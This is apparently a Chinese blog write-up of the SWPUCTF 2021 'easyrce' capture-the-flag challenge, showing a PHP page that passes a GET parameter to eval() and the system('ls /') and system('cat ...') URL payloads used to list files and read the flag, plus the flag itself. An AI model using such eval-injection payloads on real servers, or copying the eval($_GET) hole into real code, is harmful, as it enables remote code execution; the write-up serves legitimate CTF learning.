[SWPUCTF 2021 新生赛]easyrce

[SWPUCTF 2021 新生赛]easyrce

题目来源:nssctf

题目类型:web

涉及考点:命令执行

1. 题目给了一串代码,直接代码审计

<?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['url']))
{
eval($_GET['url']);
}
?>

eval():把字符串按照 PHP 代码来计算,需以分号结尾

即,我们通过GET传参,可以实现任意命令执行

2. 使用system函数

system(string $a):a为执行的命令,执行有回显,结果输出到页面上

  • 查看目录:
/?url=system("ls /");		//'ls /'列出根目录下所有的文件夹和文件

注意要传入url编码

  • cat 查看flag:
/?url=system("cat /flllllaaaaaaggggggg");

得到flag:

NSSCTF{38fa58d4-18fe-432d-ad46-705fedc020c7}

日期:2023.7.25

作者:y0Zero

posted @   y0Zero  阅读(511)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· AI 智能体引爆开源社区「GitHub 热点速览」
· 三行代码完成国际化适配,妙~啊~
· .NET Core 中如何实现缓存的预热?
点击右上角即可分享
微信分享提示